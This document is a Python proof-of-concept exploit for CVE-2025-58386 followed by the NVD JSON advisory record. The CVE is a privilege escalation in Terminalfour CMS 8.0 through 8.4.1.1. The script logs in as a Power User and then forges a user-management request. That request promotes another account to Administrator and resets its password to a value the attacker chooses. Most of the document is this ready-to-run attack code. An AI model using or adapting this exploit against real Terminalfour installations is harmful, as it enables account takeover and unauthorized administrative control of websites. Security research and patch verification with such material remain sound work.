CVE-2025-58386

import requests import re # CVE-2025-58386 PoC - Terminalfour Privilege Escalation # Target: Terminalfour CMS 8.0 - 8.4.1.1 # Vulnerability: Insecure userLevel parameter in user management target_url = "http://target-server/terminalfour/" # Step 1: Login as Power User login_url = target_url + "LoginServlet" credentials = { "username": "poweruser", "password": "PowerUserPass123" } session = requests.Session() response = session.post(login_url, data=credentials) # Step 2: Get valid session token session_token = session.cookies.get('JSESSIONID') # Step 3: Intercept and modify user management request user_mgmt_url = target_url + "UserManagerServlet" # Original request (Power User promoting own account) original_data = { "action": "updateUser", "userId": "100", "userLevel": "2", # Original: Power User level "password": "" } # Modified request (Escalating to Administrator) escalated_data = { "action": "updateUser", "userId": "101", # Target: lower-privileged user "userLevel": "1", # Modified: Administrator level (typically 1) "password": "HackedPass123!" # Optional: reset password } headers = { "Cookie": f"JSESSIONID={session_token}", "Content-Type": "application/x-www-form-urlencoded" } # Step 4: Send escalated request response = session.post(user_mgmt_url, data=escalated_data, headers=headers) # Step 5: Verify privilege escalation if response.status_code == 200: # Login with modified credentials to verify admin access admin_login = session.post(login_url, data={ "username": "targetuser", "password": "HackedPass123!" }) if "admin" in admin_login.text.lower() or admin_login.status_code == 200: print("[+] Privilege Escalation Successful!") print("[+] User 101 is now Administrator") else: print("[-] Escalation may have failed")

{"cve": {"id": "CVE-2025-58386", "sourceIdentifier": "[email protected]", "published": "2025-12-02T18:15:48.007", "lastModified": "2025-12-19T18:27:13.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Terminalfour 8 through 8.4.1.1, the userLevel parameter in the user management function is not subject to proper server-side authorization checks. A Power User can intercept and modify this parameter to assign the Administrator role to other existing lower-privileged accounts, or invite a new lower-privileged account and escalate its privileges. While manipulating this request, the Power User can also change the target account's password, effectively taking full control of it."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:terminalfour:terminalfour:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.4.1.2", "matchCriteriaId": "EC2B364B-AEA6-42D7-ADA4-59AD7D27547B"}]}]}], "references": [{"url": "https://docs.terminalfour.com/release-notes/security-notices/cve-2025-58386/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://terminalfour.com", "source": "[email protected]", "tags": ["Product"]}]}}